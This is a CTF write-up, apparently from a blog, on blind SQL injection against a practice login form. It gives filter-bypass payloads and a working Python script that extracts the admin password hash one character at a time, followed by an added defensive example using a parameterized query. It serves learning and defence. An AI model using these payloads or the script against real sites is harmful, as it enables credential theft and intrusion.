Python SQL injection CTF: CTF-WEB, blind SQL injection on a login form
Some seniors gave me a practice platform. I had just learned a lot about SQL injection and writing scripts and was itching to try it out, but this one turned into a long haul; there is still a lot I am not familiar with.
First, find the injection point:
The form reports a wrong username and a wrong password with different messages, so boolean-based blind injection is possible. (*^▽^*) So happy.
But then I found that spaces and the * character are filtered. No problem, parentheses get around that (this one nearly killed me).
I started writing a script and found that plain requests could not pick out the content inside the tag, so I went off to learn a bit of "beautiful soup", BeautifulSoup, for parsing the page.
First, a test snippet:
# -*- coding:utf-8 -*-
from bs4 import BeautifulSoup
import requests

session = requests.Session()
paramsPost = {"password": "1", "username": "admin"}
headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0", "Referer": "http://152.136.63.75:8002/", "Connection": "close", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "DNT": "1", "Content-Type": "application/x-www-form-urlencoded"}
cookies = {"PHPSESSID": "f1jb3rhc5ebhv1gf7q943bb413"}

# Send one login attempt and inspect the response
res = session.post("http://152.136.63.75:8002/", data=paramsPost, headers=headers, cookies=cookies)
res.encoding = 'utf-8'
print("Status code: %i" % res.status_code)
#print("Response body: %s" % res.content)

# Parse the HTML and look for the "wrong password" message inside the tag
soup = BeautifulSoup(res.text, 'html.parser')
result = soup.find_all(text='密碼錯誤')
print(result)
print(type(result))
Output:
Here the Burp Suite extension Reissue Request Scripter can generate the requests headers quickly and save time writing the script.
Then comes constructing the statements. You can check your commands locally in an SQL client first, because there really are a lot of parentheses and you have to keep trying.
I also took away a lesson: keep a notepad, write the payloads down one by one, and keep the query statement separate from the condition:
# the main body that everything is spliced into
admin'^1^(ascii()={})
# substr to confirm the data
substr(( ),{},1)
# the query
select(group_concat(table_name))from(information_schema.tables)where(table_schema)=(database())
# each time the query changes, assemble the whole thing again (the column-name query went wrong so many times I doubted my life)
admin'^1^if((select(length(group_concat(column_name))=%d)from(information_schema.columns)where(table_schema)=(database())and(table_name)='admin'),1,0)#
The thing to watch here is the length-probe condition (another easy place to slip up):
# you must write select (length() = '')
select * from users where id =1^if((select(length(group_concat(table_name))= ' ')from(information_schema.tables)where(table_schema)=(database())),1,0);
# wrong statement
select * from users where id =1^if((select(length(group_concat(table_name)))from(information_schema.tables)where(table_schema)=(database()) = ' '),1,0);
# whatever the number, the result is always NULL
The comparison sits in a different place, so the result differs and the final outcome changes: because = is left-associative, the trailing = ' ' in the wrong statement attaches to the where comparison (table_schema)=(database()) instead of to length(...), so the where clause no longer matches the intended rows and length(group_concat(...)) over no rows is NULL.
The script:
import requests
import string
from bs4 import BeautifulSoup

# Character set to try at each position (renamed from `str`, which shadowed the built-in)
charset = string.ascii_lowercase + string.ascii_uppercase + string.digits + '-{}+='
session = requests.Session()
paramsPost = {"password": 1, "username": " "}
headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0", "Referer": "http://152.136.63.75:8002/", "Connection": "close", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "DNT": "1", "Content-Type": "application/x-www-form-urlencoded"}
cookies = {"PHPSESSID": "f1jb3rhc5ebhv1gf7q943bb413"}


def name():
    """Recover the value one character at a time with ascii(substr(...))."""
    flag = " "
    for i in range(length()):
        for ch in charset:
            #paramsPost["username"] = "admin'^1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_schema)=(database())and(table_name)='admin'),{},1))={})#".format(i+1, ord(ch))
            paramsPost["username"] = "admin'^1^(ascii(substr((select(password)from(admin)where(username)='admin'),{},1))={})#".format(i + 1, ord(ch))
            print(ch)
            res = session.post("http://152.136.63.75:8002/", data=paramsPost, headers=headers, cookies=cookies)
            res.encoding = 'utf-8'
            soup = BeautifulSoup(res.text, 'html.parser')
            result = soup.find_all(text='密碼錯誤')
            #print(result)
            # the "wrong password" message only appears when the injected condition held
            if len(result) != 0:
                flag += ch
                break
        print(flag)
        if flag[-1] == '}':
            break
    print(flag)


def length():
    """Find the length of the target value by probing length(...)=i."""
    len1 = 0
    for i in range(50):
        #paramsPost['username'] = "admin'^1^if((select(length(group_concat(column_name))=%d)from(information_schema.columns)where(table_schema)=(database())and(table_name)='admin'),1,0)#" % i
        paramsPost['username'] = "admin'^1^(select(length(password)=%d)from(admin)where(username)='admin')#" % i
        res = session.post("http://152.136.63.75:8002/", data=paramsPost, headers=headers, cookies=cookies)
        res.encoding = 'utf-8'
        soup = BeautifulSoup(res.text, 'html.parser')
        result = soup.find_all(text='密碼錯誤')
        print(result)
        if len(result) != 0:
            len1 = i
            break
    print(len1)
    return len1


name()
Dumping the data step by step, the admin password turned out to be an MD5 hash.
In the end this challenge turned out to be basically the same as Bugku's login3, but doing it from start to finish myself showed that my statement construction still has many gaps; blind SQL injection needs a lot more practice.
Original link: https://blog.csdn.net/weixin_45887311/article/details/105739091
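The two things that made this work are the username being spliced into the SQL text and the two different failure messages that act as the oracle. As an added example (not from the write-up or the challenge), here is a stand-in login check in Python with sqlite3 showing the vulnerable shape beside a hardened one: a bound parameter plus a single failure message, so the write-up's payload is handled as an ordinary non-existent username and nothing is left to distinguish. The table, salt, iteration count and test password are constructed for the demo.

```python
import hashlib
import hmac
import os
import sqlite3

ITER = 50_000  # PBKDF2 iteration count (constructed value for the demo)


def make_db():
    # Constructed stand-in for the challenge's `admin` table: one user, salted PBKDF2 hash
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (username TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    conn.execute("INSERT INTO admin VALUES (?, ?, ?)",
                 ("admin", salt, hashlib.pbkdf2_hmac("sha256", b"s3cret", salt, ITER)))
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    # Both defects the write-up relies on: the username is spliced into the SQL text,
    # and three distinguishable outcomes (user missing / bad password / SQL error) leak.
    try:
        row = conn.execute(
            "SELECT salt, pw_hash FROM admin WHERE username = '%s'" % username).fetchone()
    except sqlite3.Error:
        return "server error"
    if row is None:
        return "username incorrect"
    if not hmac.compare_digest(row[1], hashlib.pbkdf2_hmac("sha256", password.encode(), row[0], ITER)):
        return "password incorrect"
    return "ok"


def login_hardened(conn, username, password):
    # Bound parameter: the username is data, never parsed as SQL, so the
    # parenthesis / XOR / comment tricks from the write-up have nothing to act on.
    row = conn.execute(
        "SELECT salt, pw_hash FROM admin WHERE username = ?", (username,)).fetchone()
    # Hash against a dummy record when the user is missing, so the message
    # (and roughly the timing) is identical for both failure paths.
    salt, stored = row if row else (b"\x00" * 16, b"\x00" * 32)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITER)
    if row is None or not hmac.compare_digest(stored, candidate):
        return "invalid username or password"
    return "ok"


if __name__ == "__main__":
    db = make_db()
    probe = "admin'^1^(select(length(password)=32)from(admin)where(username)='admin')#"
    for fn in (login_vulnerable, login_hardened):
        print(fn.__name__, fn(db, "nobody", "x"), "|", fn(db, "admin", "x"), "|", fn(db, probe, "x"))
```

Run stand-alone it prints, per variant, the responses for an unknown user, a known user with a wrong password, and the write-up's payload; only the vulnerable variant gives three different answers.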